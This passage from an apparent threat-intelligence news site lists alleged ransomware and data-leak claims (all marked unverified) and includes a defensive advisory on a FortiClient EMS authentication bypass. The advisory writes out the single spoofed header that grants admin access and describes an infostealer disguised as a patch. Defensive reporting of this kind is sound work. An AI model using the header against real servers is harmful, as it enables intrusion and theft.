College Health Listed on Ransomware Leak Site URL: https://darkwebinformer.com/us-student-mental-health-provider-mindpath-college-health-listed-on-ransomware-leak-site/ Last updated: 2026-05-28T22:33:59.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshot ## ⚠Potential impact ## iStatus ✕ ### One Forged Header: Unauthenticated Authentication Bypass in Fortinet FortiClient EMS (CVE-2026-35616) URL: https://darkwebinformer.com/one-forged-header-unauthenticated-authentication-bypass-in-fortinet-forticlient-ems-cve-2026-35616/ Last updated: 2026-05-28T17:33:18.000Z Critical CVSS 3.1 9.1 Status Actively Exploited CISA KEV Added 2026-04-06 # One Forged Header: Unauthenticated Authentication Bypass in Fortinet FortiClient EMS (CVE-2026-35616) Fortinet FortiClient EMS • CWE-284 Improper Access Control • Published 2026-04-04 ## Vulnerability Overview Fortinet has disclosed a critical authentication bypass affecting **FortiClient Endpoint Management Server (EMS)**. Tracked as [CVE-2026-35616](https://nvd.nist.gov/vuln/detail/CVE-2026-35616) and carrying a **CVSS score of 9.1**, the flaw lets a remote, unauthenticated attacker bypass the EMS API's certificate-based authentication and issue privileged requests as if they were a trusted administrator. From that position an attacker can execute unauthorized code or commands and reach the endpoints EMS manages. The vulnerability was exploited in the wild before Fortinet published its advisory, and [CISA added it to the Known Exploited Vulnerabilities catalog](https://www.cisa.gov/news-events/alerts/2026/04/06/cisa-adds-one-known-exploited-vulnerability-catalog) on April 6, 2026. CVE ID CVE-2026-35616 CVSS Score 9.1 - Critical Weakness CWE-284 Affected Product FortiClient EMS Affected Versions 7.4.5 - 7.4.6 Attack Vector Network / Unauthenticated Exploitation In the Wild Fix Hotfix & 7.4.7 Bottom Line If you run FortiClient EMS 7.4.5 or 7.4.6 without the hotfix applied, treat the server as compromised until proven otherwise. This was a zero-day, so patching alone is not a complete response. ## Why FortiClient EMS Is a High-Value Target FortiClient EMS is the central management plane of a Fortinet endpoint deployment. Organizations use it to push security policies, manage VPN profiles, enforce compliance posture, and control FortiClient agents across the entire fleet from one console. That central position is exactly what makes a flaw here so dangerous: as [watchTowr noted](https://watchtowr.com/resources/fortinet-forticlient-ems-zero-day-cve-2026-35616-active-exploitation-underway/), a compromised EMS server gives an attacker the ability to manipulate endpoint configurations, push malicious policies, and pivot laterally into the wider environment. You are not just losing one server - you are losing the system that governs all the others. ## Technical Analysis The clearest breakdown of the root cause comes from [Bishop Fox](https://bishopfox.com/blog/api-authentication-bypass-in-forticlient-ems-7-4-5-7-4-6-cve-2026-35616), who reverse-engineered the flaw from Fortinet's hotfix. It is a textbook trust boundary violation built on two compounding mistakes. First, the Django application behind EMS reads client-certificate information from HTTP headers - specifically `X-SSL-CLIENT-VERIFY` and `X-SSL-CLIENT-CERT` \- and treats them as equivalent to the WSGI environment variables that Apache's `mod_ssl` normally populates. In a correct setup those headers would only ever be set internally by the reverse proxy after a genuine TLS client-certificate handshake. But the Apache configuration shipped with EMS never strips them from inbound requests, so a value an attacker types into a header travels all the way to the application and is trusted as if it came from the proxy. Second, the certificate validation that follows is hollow. According to Bishop Fox, the certificate-chain check performs only string matching on the Distinguished Name (subject/issuer), with no cryptographic signature verification. An attacker therefore does not need a legitimately signed certificate - they can forge one whose DN strings match what the server expects. Put together, the exploit collapses to almost nothing. Researchers including [Kerem Atın demonstrated](https://github.com/keraattin/CVE-2026-35616) that injecting a single header - `X-SSL-CLIENT-VERIFY: SUCCESS` \- into a request to an EMS API endpoint flips the server from unauthenticated to fully authenticated administrator. No brute force, no credential stuffing, no user interaction. ## Active Exploitation in the Wild This is not theoretical. [watchTowr's sensors detected exploitation on March 31, 2026](https://watchtowr.com/resources/fortinet-forticlient-ems-zero-day-cve-2026-35616-active-exploitation-underway/) \- days ahead of Fortinet's April 4 advisory - meaning attackers were already inside affected environments at disclosure. [Cybersecurity Dive reported](https://www.cybersecuritydive.com/news/critical-flaw-forticlient-ems-exploitation/816699/) that the Shadowserver Foundation flagged active abuse, and noted this was the second unauthenticated FortiClient EMS bug in a matter of weeks, landing over the Easter holiday weekend when response teams were thin. [Arctic Wolf documented a full intrusion chain](https://arcticwolf.com/resources/blog/forticlient-ems-exploited-via-cve-2026-35616-to-deliver-ekz-infostealer-disguised-as-a-fortinet-patch/) built on this CVE. After bypassing authentication, the threat actor abused EMS's trusted position to push malware to managed endpoints, disguising a credential stealer as a Fortinet update. The payload - delivered as `FortiEndpoint_Patch.exe` and executed silently through PowerShell - is a MinGW-compiled Windows infostealer Arctic Wolf calls **EKZ**, capable of extracting saved credentials from Chrome and Firefox, including techniques to defeat Chrome's encrypted password storage. Malware masquerading as the patch for the very vulnerability used to deliver it is a detail worth flagging to defenders. ## Detection Several researchers have published safe, non-destructive detection scripts that use differential response analysis. The technique sends a baseline request with no special headers - a patched or unaffected server returns HTTP 401 - then sends the identical request with `X-SSL-CLIENT-VERIFY: SUCCESS` injected. If the status code changes (typically to 500 or 200), the middleware is trusting the spoofed header and the host is vulnerable. No exploit payload is sent. [Bishop Fox's checker](https://github.com/BishopFox/CVE-2026-35616-check) is a good starting point and relies only on the Python standard library. Detection Tell The hotfix adds Apache `RequestHeader unset` directives that strip `X-SSL-CLIENT-VERIFY` and `X-SSL-CLIENT-CERT` before they reach Django, so a fully patched server returns an identical 401 to both probes. ## Affected Versions & Fixes | Product | Affected | Resolution | | --------------------- | ------------ | --------------------------------------------------------- | | FortiClient EMS 7.4.6 | Vulnerable | Apply out-of-band hotfix; upgrade to 7.4.7 when available | | FortiClient EMS 7.4.5 | Vulnerable | Apply out-of-band hotfix; upgrade to 7.4.7 when available | | FortiClient EMS 7.4.7 | Not affected | Contains the permanent code-level fix | ## Mitigation & Remediation Priority order, drawn from [Fortinet's advisory (FG-IR-26-099)](https://fortiguard.fortinet.com/psirt/FG-IR-26-099) and [NetSPI's remediation guidance](https://www.netspi.com/blog/executive-blog/critical-vulnerability/cve-2026-35616-cve-2026-21643-fortinet-forticlientems-overview-takeaways/): 1. **Patch immediately.** Apply Fortinet's out-of-band hotfix for 7.4.5 and 7.4.6 now. The permanent, code-level fix - which also addresses the string-only certificate validation - ships in FortiClient EMS 7.4.7, so move to that release as soon as it is available rather than treating the hotfix as the finish line. 2. **Get it off the internet.** Restrict access to the EMS administrative interface to trusted IP ranges. There is no good reason for this console to be directly reachable from the public internet. 3. **Add WAF coverage.** Block anomalous HTTP header injection patterns at the edge as a defense-in-depth layer. 4. **Hunt for compromise.** Monitor EMS for unexpected child processes such as `cmd.exe` or `powershell.exe`, review managed endpoints for the EKZ indicators Arctic Wolf published, and verify the patch took by re-running a safe header-spoofing check. ## The Bigger Picture CVE-2026-35616 did not arrive alone. It followed [CVE-2026-21643](https://www.netspi.com/blog/executive-blog/critical-vulnerability/cve-2026-35616-cve-2026-21643-fortinet-forticlientems-overview-takeaways/), an unauthenticated SQL injection (CWE-89) in FortiClient EMS 7.4.4 that was also exploited in the wild and whose fix path was to move to 7.4.5 or above. Two unauthenticated, actively exploited bugs in the same management product within weeks is a strong signal that internet-facing endpoint management infrastructure deserves the same scrutiny - segmentation, monitoring, and rapid patch discipline - you would give any crown-jewel system. When a flaw lands in a management server, the question is not only whether an attacker can get in, but what authority that system holds and what it touched. ## References - [Fortinet PSIRT - FG-IR-26-099](https://fortiguard.fortinet.com/psirt/FG-IR-26-099) - [NVD - CVE-2026-35616](https://nvd.nist.gov/vuln/detail/CVE-2026-35616) - [CISA - KEV Catalog Addition (2026-04-06)](https://www.cisa.gov/news-events/alerts/2026/04/06/cisa-adds-one-known-exploited-vulnerability-catalog) - [Bishop Fox - API Authentication Bypass Root-Cause Analysis](https://bishopfox.com/blog/api-authentication-bypass-in-forticlient-ems-7-4-5-7-4-6-cve-2026-35616) - [watchTowr - Active Exploitation Underway](https://watchtowr.com/resources/fortinet-forticlient-ems-zero-day-cve-2026-35616-active-exploitation-underway/) - [Arctic Wolf - EKZ Infostealer Campaign](https://arcticwolf.com/resources/blog/forticlient-ems-exploited-via-cve-2026-35616-to-deliver-ekz-infostealer-disguised-as-a-fortinet-patch/) - [NetSPI - Overview & Remediation Takeaways](https://www.netspi.com/blog/executive-blog/critical-vulnerability/cve-2026-35616-cve-2026-21643-fortinet-forticlientems-overview-takeaways/) - [Cybersecurity Dive - Critical Flaw Under Exploitation](https://www.cybersecuritydive.com/news/critical-flaw-forticlient-ems-exploitation/816699/) - [Bishop Fox - Non-Destructive Detection Script](https://github.com/BishopFox/CVE-2026-35616-check) ### French Real-Estate Tour Platform EnVisite Hit by Alleged 138K-Record Leak URL: https://darkwebinformer.com/french-real-estate-tour-platform-envisite-hit-by-alleged-138k-record-leak/ Last updated: 2026-05-28T16:50:24.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshot ## ⚠Potential impact ## iStatus ✕ ### French Real-Estate Platform Figaro Immobilier Hit by Alleged 100K Invoice Leak URL: https://darkwebinformer.com/french-real-estate-platform-figaro-immobilier-hit-by-alleged-100k-invoice-leak/ Last updated: 2026-05-28T16:30:38.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshot ## ⚠Potential impact ## iStatus ✕ ### French Government Platform Resana Listed in Alleged 990K-Record User Data Sale URL: https://darkwebinformer.com/french-government-platform-resana-listed-in-alleged-990k-record-user-data-sale/ Last updated: 2026-05-28T16:09:28.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshot ## ⚠Potential impact ## iStatus ✕ ### Brazilian Food-Delivery Giant iFood Targeted in Alleged 43.8M-Record Customer Data Extortion URL: https://darkwebinformer.com/brazilian-food-delivery-giant-ifood-targeted-in-alleged-43-8m-record-customer-data-extortion/ Last updated: 2026-05-28T15:20:20.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshot ## ⚠Potential impact ## iStatus ✕ ### Bermudian Financial Service EasyPay Hit by Alleged Full Database Leak With 2M Transactions & 10K Cards URL: https://darkwebinformer.com/bermudian-financial-service-easypay-hit-by-alleged-full-database-leak-with-2m-transactions-10k-cards/ Last updated: 2026-05-27T16:35:43.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshot ## ⚠Potential impact ## iStatus ✕ ### Mexican Civil Protection Training Portal Hit by Alleged Admin Compromise & Credential Leak URL: https://darkwebinformer.com/mexican-civil-protection-training-portal-hit-by-alleged-admin-compromise-credential-leak/ Last updated: 2026-05-27T16:02:28.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshots ## ⚠Potential impact ## iStatus ✕ ### French Campsite Federation FNHPA Hit by Alleged 9K Member & Invoice Leak URL: https://darkwebinformer.com/french-campsite-federation-fnhpa-hit-by-alleged-9k-member-invoice-leak/ Last updated: 2026-05-27T15:29:58.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshot ## ⚠Potential impact ## iStatus ✕ ### Mexican Instituto Tecnológico de Zacatepec Named in Alleged Student Database Leak URL: https://darkwebinformer.com/mexican-instituto-tecnologico-de-zacatepec-named-in-alleged-student-database-leak/ Last updated: 2026-05-27T14:51:03.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshot ## ⚠Potential impact ## iStatus ✕ ### Saudi Portal Nitaqat Listed in Alleged 437K-Record Contacts & CRM Data Sale URL: https://darkwebinformer.com/saudi-portal-nitaqat-listed-in-alleged-437k-record-contacts-crm-data-sale/ Last updated: 2026-05-27T14:21:32.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshot ## ⚠Potential impact ## iStatus ✕ ### UK Transport Firm Tripocity Listed in Alleged 202K-User Database Sale URL: https://darkwebinformer.com/uk-transport-firm-tripocity-listed-in-alleged-202k-user-database-sale/ Last updated: 2026-05-26T23:09:12.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshots ## ⚠Potential impact ## iStatus ✕ ### Brazilian Logistics Firm EcoAssist Listed in Alleged 1.19M-Record Personal Data Sale URL: https://darkwebinformer.com/brazilian-logistics-firm-ecoassist-listed-in-alleged-1-19m-record-personal-data-sale/ Last updated: 2026-05-26T22:01:36.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshots ## ⚠Potential impact ## iStatus ✕ ### Singapore F&B Chain Koufu Listed in Alleged 191K-User Database Sale URL: https://darkwebinformer.com/singapore-f-b-chain-koufu-listed-in-alleged-191k-user-database-sale/ Last updated: 2026-05-26T21:24:08.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshot ## ⚠Potential impact ## iStatus ✕ ### French Inspection Firm Socotec Hit by Alleged 8.4K Customer & Business Invoice Leak URL: https://darkwebinformer.com/french-inspection-firm-socotec-hit-by-alleged-8-4k-customer-business-invoice-leak/ Last updated: 2026-05-26T20:59:33.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshot ## ⚠Potential impact ## iStatus ✕ ### Alleged Live Access to a Spanish Public-Sector Payroll Portal Offered for Sale URL: https://darkwebinformer.com/alleged-live-access-to-a-spanish-public-sector-payroll-portal-offered-for-sale/ Last updated: 2026-05-26T22:35:42.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshot ## ⚠Potential impact ## iStatus ✕ ### French DIY Marketplace ManoMano Hit by Alleged 178K-Record Customer Order Leak URL: https://darkwebinformer.com/french-diy-marketplace-manomano-hit-by-alleged-178k-record-customer-order-leak/ Last updated: 2026-05-26T15:50:40.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshot ## ⚠Potential impact ## iStatus ✕ ### Mexican Process-Automation Firm DCI Group Hit by Alleged Leak of 240K National IDs & Mortgage Data URL: https://darkwebinformer.com/mexican-process-automation-firm-dci-group-hit-by-alleged-leak-of-240k-national-ids-mortgage-data/ Last updated: 2026-05-26T16:58:25.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshots ## ⚠Potential impact ## iStatus ✕ ### Chinese Marketplace Vigorbuy.com Hit by Alleged MySQL Dump With Payment & Credential Data URL: https://darkwebinformer.com/chinese-marketplace-vigorbuy-com-hit-by-alleged-mysql-dump-with-payment-credential-data/ Last updated: 2026-05-25T21:30:10.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshot ## ⚠Potential impact ## iStatus ✕ ### Alleged 130K-Record Mercedes Automobile Customer Database Advertised on Forum URL: https://darkwebinformer.com/alleged-130k-record-mercedes-automobile-customer-database-advertised-on-forum/ Last updated: 2026-05-25T20:51:25.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshot ## ⚠Potential impact ## iStatus ✕ ### Colombian BPO ContactMaster BPO Listed in Alleged Access Sale Tied to Claro Móvil Colombia URL: https://darkwebinformer.com/colombian-bpo-contactmaster-bpo-listed-in-alleged-access-sale-tied-to-claro-movil-colombia/ Last updated: 2026-05-25T16:35:50.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshots ## ⚠Potential impact ## iStatus ✕ ### French Retailer La Redoute Hit by Alleged 96K-Record Customer & Delivery Data Dump URL: https://darkwebinformer.com/french-retailer-la-redoute-hit-by-alleged-96k-record-customer-delivery-data-dump/ Last updated: 2026-05-25T16:16:06.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshot ## ⚠Potential impact ## iStatus ✕ ### Undisclosed AI Chat Platform Listed in Alleged Customer Data Sale With Card Details URL: https://darkwebinformer.com/undisclosed-ai-chat-platform-listed-in-alleged-customer-data-sale-with-card-details/ Last updated: 2026-05-25T15:58:07.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshot ## ⚠Potential impact ## iStatus ✕ ### Iranian Mobile Operator MCI Listed in Alleged Internal Network Infrastructure Leak URL: https://darkwebinformer.com/iranian-mobile-operator-mci-listed-in-alleged-internal-network-infrastructure-leak/ Last updated: 2026-05-25T15:26:20.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshot ## ⚠Potential impact ## iStatus ✕ ### Mexican University UT Sierra Hidalguense Named in Alleged Student Database Leak URL: https://darkwebinformer.com/mexican-university-ut-sierra-hidalguense-named-in-alleged-student-database-leak/ Last updated: 2026-05-25T15:10:22.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshot ## ⚠Potential impact ## iStatus ✕ ### Romanian Education Platform EduSal Hit by Alleged 331K-Record Teacher & Admin Data Dump URL: https://darkwebinformer.com/romanian-education-platform-edusal-hit-by-alleged-331k-record-teacher-admin-data-dump/ Last updated: 2026-05-24T16:30:11.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshot ## ⚠Potential impact ## iStatus ✕ ### Swiss Parking Platform Parkingpay Listed in Alleged 2.8M-Record Data Sale URL: https://darkwebinformer.com/swiss-parking-platform-parkingpay-listed-in-alleged-2-8m-record-data-sale/ Last updated: 2026-05-24T16:15:00.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshot ## ⚠Potential impact ## iStatus ✕ ### Philippine Ramen Chain Ramen Kuroda Hit by Alleged 7M-Record Customer Database Leak URL: https://darkwebinformer.com/philippine-ramen-chain-ramen-kuroda-hit-by-alleged-7m-record-customer-database-leak/ Last updated: 2026-05-24T15:53:02.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshots ## ⚠Potential impact ## iStatus ✕ ### Brazilian ERP Software House Sisplan Sistemas Listed in Alleged Source Code & Database Sale URL: https://darkwebinformer.com/brazilian-erp-software-house-sisplan-sistemas-listed-in-alleged-source-code-database-sale/ Last updated: 2026-05-24T15:43:05.000Z # Severity ## ▣Post details ## !Allegedly exposed ## ◱Screenshot ## ⚠Potential impact ## iStatus ✕ ### Spanish Aerospace Manufacturer MyM Listed in Alleged Ransomware Data Theft Post URL: https://darkwebinformer.com/spanish-aerospace-manufacturer-mym-listed-in-alleged-ransomware-data-theft-postspanish-aerospace-manufacturer-mym-listed-in-alleged-ransomware-data-theft-post/ Last updated: 2026-05-23T19:45:57.000Z Breach Report ![Spain flag](https://flagcdn.com/w40/es.png)Spain # Spanish Aerospace Manufacturer MyM Listed in Alleged Ransomware Data Theft Post A ransomware group is claiming to have collected data allegedly belonging to Mecanizados y Montajes Aeronáuticos, a Spanish aerospace manufacturing company serving major Tier 1 and OEM programs. The listing claims the exposed archive totals 100GB and includes confidential, client, financial, operational, and corporate records. Exposure100GB Revenue$500K Country![Spain flag](https://flagcdn.com/w40/es.png)Spain ActorINC Ransom ## ▣Post details TargetMecanizados y Montajes Aeronáuticos Country![Spain flag](https://flagcdn.com/w40/es.png)Spain SectorAerospace / Manufacturing ClaimCorporate Ransomware theft Exposure100GB ObservedMay 21, 2026 Revenue$500K ActorNot shown ## !What is allegedly exposed - Confidential documents - Client data - NDA documents - Financial data - Operations records - Corporate data - Business agreements - Development-related files - Financial databases and transaction records - Client and supplier-related documents ## ◱Screenshot [ ![Mecanizados y Montajes Aeronáuticos alleged 100GB data leak screenshot showing document samples](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/23578923589762359876239871.png) Screenshot 1 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/23578923589762359876239871.png) ## ⚠Potential impact The exposed information could be used for supplier impersonation, business email compromise, financial fraud, contract targeting, competitive intelligence collection, and social engineering against aerospace customers, vendors, and internal personnel. ## iStatus Unverified underground forum claim. The listing includes a screenshot preview and claims a 100GB archive, but the exposure has not been independently confirmed. Want the non-blurred screenshots? Subscribe and check out the threat feed or ransomware feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing) ### Avea Vacances Allegedly Breached: 46K French Holiday Camp Records Exposed URL: https://darkwebinformer.com/avea-vacances-allegedly-breached-46k-french-holiday-camp-records-exposed/ Last updated: 2026-05-23T19:41:00.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France # Avea Vacances Allegedly Breached: 46K French Holiday Camp Records Exposed A threat actor on an underground forum is claiming to leak databases allegedly belonging to Avea Vacances, a French organization offering holiday camps and educational stays for children and teenagers. The actor claims the dataset contains 46K records across documents, customer/entity data, invoices, and accounting-related files. Exposure46K records Size128MB Country![France flag](https://flagcdn.com/w40/fr.png)France ActorChimeraZ ## ▣Post details TargetAvea Vacances Country![France flag](https://flagcdn.com/w40/fr.png)France SectorTravel / Holiday Camps / Youth Education ClaimDatabase leak Exposure46K records / 128MB ObservedMay 23, 2026 PriceNot stated ActorChimeraZ ## !What is allegedly exposed - Document records - Customer and entity records - Invoice data - Accounting document records - Names and birth date fields - Establishment and organization fields - Payment and invoice status data - Budget, amount, and transaction metadata - PDF document references ## ◱Screenshot [ ![Avea Vacances alleged database leak screenshot showing sample JSON records and download claim](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/23879589723568792346987254398723.png) Screenshot 1 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/23879589723568792346987254398723.png) ## ⚠Potential impact The exposed information could be used for phishing, identity fraud, invoice fraud, targeted scams, and social engineering against families, employees, partner organizations, and youth travel service contacts. ## iStatus Unverified underground forum claim. The actor posted sample records and download references, but the exposure has not been independently confirmed. Want the non-blurred screenshots? Subscribe and check out the threat feed or ransomware feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing) ### Optic 2000 Allegedly Targeted: Invoice Files, Franchise Data, and Customer Records Exposed URL: https://darkwebinformer.com/optic-2000-allegedly-targeted-invoice-files-franchise-data-and-customer-records-exposed/ Last updated: 2026-05-23T17:29:58.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France # Optic 2000 Allegedly Targeted: Invoice Files, Franchise Data, and Customer Records Exposed A threat actor on an underground forum is claiming to have leaked a database allegedly belonging to Optic 2000, a French optical retail and eyewear brand. The actor claims the dump includes invoice files, franchise information, and customer-related records. Exposure7,898 PDF files + data JSON Price2 forum points Country![France flag](https://flagcdn.com/w40/fr.png)France ActorAplaGroup ## ▣Post details TargetOptic 2000 Country![France flag](https://flagcdn.com/w40/fr.png)France SectorRetail / Eyewear / Optician ClaimDatabase leak Exposure7,898 PDF files + data JSON ObservedMay 23, 2026 Price2 forum points ActorAplaGroup ## !What is allegedly exposed - Invoice PDF files - Franchise information - Customer ID fields - Names and contact fields - Delivery address data - Billing address data - Email address fields - Fax and mobile number fields - Invoice-related records ## ◱Screenshot [ ![Optic 2000 alleged database leak screenshot showing forum post and exposed file inventory](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/98723856293875629873568729352.png) Screenshot 1 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/98723856293875629873568729352.png) ## ⚠Potential impact The exposed information could be used for phishing, invoice fraud, customer impersonation, targeted scams, and social engineering against customers, franchise contacts, and retail operations. ## iStatus Unverified underground forum claim. The actor posted file inventory details and claims the dump includes invoice PDFs, franchise information, and customer-related data, but the exposure has not been independently confirmed. Want the non-blurred screenshots? Subscribe and check out the threat feed or ransomware feed section. darkwebinformer.com/pricing ### Chilean Fire Department System Allegedly Breached: VIPER Platform Records and Internal Documents Exposed URL: https://darkwebinformer.com/chilean-fire-department-system-allegedly-breached-viper-platform-records-and-internal-documents-exposed/ Last updated: 2026-05-23T17:23:13.000Z Breach Report ![Chile flag](https://flagcdn.com/w40/cl.png)Chile # Chilean Fire Department System Allegedly Breached: VIPER Platform Records and Internal Documents Exposed A threat actor on an underground forum is claiming to have compromised VIPER, an integrated management platform allegedly used by Chilean fire departments. The actor claims the access includes administrative portal data, internal documents, firefighter records, operational messages, and system data tied to hundreds of fire departments. ExposureInternal documents and firefighter records PriceFree Country![Chile flag](https://flagcdn.com/w40/cl.png)Chile ActorazazeljakeI ## ▣Post details TargetVIPER / Chilean Fire Department Management System Country![Chile flag](https://flagcdn.com/w40/cl.png)Chile SectorEmergency Services / Fire Department / Public Safety ClaimIntegrated management system breach ExposureInternal documents, firefighter records, and portal access claims ObservedMay 23, 2026 PriceFree ActorazazeljakeI ## !What is allegedly exposed - Firefighter profile records - Full names and identity fields - Email address fields - Phone number fields - Address records - Civil status and nationality fields - Internal fire department documents - Portal administration access claims - Operational messaging and record modification claims ## ◱Screenshot [ ![VIPER alleged breach screenshot showing Chilean firefighter records and internal system sample](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/72357896239874623897462893756982734689762.png) Screenshot 1 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/72357896239874623897462893756982734689762.png) ## ⚠Potential impact The exposed information could be used for phishing, impersonation, targeted scams, operational disruption, unauthorized messaging, and social engineering against firefighters, public safety staff, and Chilean emergency services organizations. ## iStatus Unverified underground forum claim. The actor claims to have administrative access to the VIPER platform and shared sample records, but the extent of the alleged compromise has not been independently confirmed. Want the non-blurred screenshots? Subscribe and check out the threat feed or ransomware feed section. darkwebinformer.com/pricing ### WisERP Allegedly Targeted: 1.5M U.S. ERP Customer Records Advertised in Auction URL: https://darkwebinformer.com/wiserp-allegedly-targeted-1-5m-u-s-erp-customer-records-advertised-in-auction/ Last updated: 2026-05-23T15:43:40.000Z ![United States flag](https://flagcdn.com/w40/us.png)Breach Report · United States # WisERP Allegedly Targeted: 1.5M U.S. ERP Customer Records Advertised in Auction A threat actor on an underground forum is claiming to auction a customer database allegedly belonging to WisERP, a smart ERP solutions provider for modern businesses. The actor claims the dataset contains 1,531,363 CSV records and is being auctioned with a starting bid of $10. TargetWisERP Country![United States flag](https://flagcdn.com/w40/us.png)United States Exposure1,531,363 CSV records ActorzSenior ## ▣Post details TargetWisERP Country![United States flag](https://flagcdn.com/w40/us.png)United States SectorERP Software / Business Management ActorzSenior ClaimCustomer database auction Exposure1,531,363 CSV records / 304MB PriceStarting bid $10 ObservedMay 23, 2026 ## !What is allegedly exposed - Distributor names - Retailer names - IBO and market fields - Office and status fields - First, middle, and last names - Mobile phone numbers - Email address fields - RAD ID and ETC code fields - Address, city, state, and ZIP code records - CSV-formatted customer database records ## ◎Screenshots [ ![WisERP alleged customer database auction screenshot showing forum post and CSV sample](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/92378562938765928736598723645987234679823.png) Screenshot 1 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/92378562938765928736598723645987234679823.png) ## ⚠Potential impact The exposed data could be used for phishing, customer impersonation, business email compromise targeting, unsolicited outreach, identity fraud, and targeted social engineering against WisERP customers and business contacts. ## iStatus Unverified underground forum claim. The actor posted a CSV sample preview and claims the full customer database is being offered through an auction listing. Want the non-blurred screenshots? Subscribe and check out the threat feed or ransomware feed section. darkwebinformer.com/pricing ### Pakistani Government Agencies Allegedly Targeted in Multi-Department Personnel Database Leak URL: https://darkwebinformer.com/pakistani-government-agencies-allegedly-targeted-in-multi-department-personnel-database-leak/ Last updated: 2026-05-23T19:40:52.000Z ![Pakistan flag](https://flagcdn.com/w40/pk.png)Breach Report · Pakistan # Pakistani Government Agencies Allegedly Targeted in Multi-Department Personnel Database Leak A threat actor on an underground forum is claiming to share database entries allegedly tied to multiple Pakistani government agencies. The actor claims the dataset includes personnel records across departments including agriculture, religious affairs, finance, power, education, housing, irrigation, tourism, transport, and other public-sector offices. TargetPakistani government agencies Country![Pakistan flag](https://flagcdn.com/w40/pk.png)Pakistan ExposureGovernment employee records ActorN2LX ## ▣Post details TargetPakistani government agencies Country![Pakistan flag](https://flagcdn.com/w40/pk.png)Pakistan SectorGovernment / Public Administration ActorN2LX ClaimMulti-agency personnel database leak ExposureGovernment employee records Price8 forum points ObservedMay 23, 2026 ## !What is allegedly exposed - Department names - Full names - Section and designation fields - Home address fields - Phone number fields - Father’s name fields - Date of birth fields - Blood group fields - Emergency contact fields - Service start date records - Personnel number and grade fields - Current posting and email address fields ## ◎Screenshots [ ![Pakistani government agencies alleged database leak screenshot showing forum post and sample fields](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/27389598723658972365897236589723.png) Screenshot 1 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/27389598723658972365897236589723.png) ## ⚠Potential impact The exposed data could be used for phishing, impersonation, credential targeting, employment-related scams, identity theft, and social engineering against government personnel and public-sector offices. ## iStatus Unverified underground forum claim. The actor posted a sample preview and claims access to personnel-related database entries across multiple Pakistani government agencies. Want the non-blurred screenshots? Subscribe and check out the threat feed or ransomware feed section. darkwebinformer.com/pricing ### CVE-2026-48172: Critical LiteSpeed cPanel Plugin Flaw Exploited for Privilege Escalation URL: https://darkwebinformer.com/cve-2026-48172-critical-litespeed-cpanel-plugin-flaw-exploited-for-privilege-escalation/ Last updated: 2026-05-22T17:35:08.000Z ⚠ Active Exploitation - Privilege Escalation CVE CVE-2026-48172 CVSS 10.0 Critical Type Privilege Escalation Product LiteSpeed cPanel Plugin # CVE-2026-48172 LiteSpeed User-End cPanel Plugin privilege-escalation vulnerability reportedly exploited in the wild, with potential root-level impact on affected hosting servers. ## Vulnerability Overview **CVE-2026-48172** is a critical privilege-escalation vulnerability affecting the **LiteSpeed User-End cPanel Plugin** before version **2.4.5**. According to NVD, the flaw can allow privilege escalation, possibly to root, and was exploited in the wild in May 2026\. NVD also notes that the issue is related to mishandling of Redis enable and disable features [\[NVD\]](https://nvd.nist.gov/vuln/detail/CVE-2026-48172). The vulnerability is especially serious for shared-hosting environments because the affected component is the user-facing cPanel plugin, not just an administrator-only control surface. Security reporting around the issue describes the risk as a path from a lower-privileged cPanel user context toward root-level control on affected servers 